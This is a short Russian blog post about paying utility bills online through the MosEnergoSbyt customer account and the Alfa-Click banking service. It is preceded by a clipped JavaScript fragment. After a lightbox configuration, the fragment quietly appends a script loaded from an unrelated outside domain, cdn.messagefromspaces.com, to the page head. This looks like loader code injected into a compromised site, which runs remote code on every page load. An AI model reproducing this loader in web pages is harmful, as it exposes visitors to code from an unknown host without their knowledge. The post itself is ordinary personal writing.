, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Взял себя в руки и за 1.5 часа оплатил коммунальные платежи в интернете.

Проще всех было побороться с электричеством. Недавно пришёл пакет от МосЭнергоСбыта с информацией за последние полгода. где всё подробно описано, за что и сколько заплачено, сколько я должне, а сколько мне. На сайте МосЭнергоСбыта я получил доступ к личному кабинету, который по оформлению и функционалу напоминает личные кабинеты провайдеров или сотовых операторов. От МосЭнергоСбыта я такого не ожидал, приятно удивили.

Коммунальные услуги и городской телефон оплатил через «Альфа-Клик». И, хотя на сайте МТГС тоже есть личный кабинет, мне сначала нужно переоформить договор с МГТС на себя, только после этого доступ к нему выдадут.

Ну и договор с МосЭнергоСбытом тоже пора на себя переформить.

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.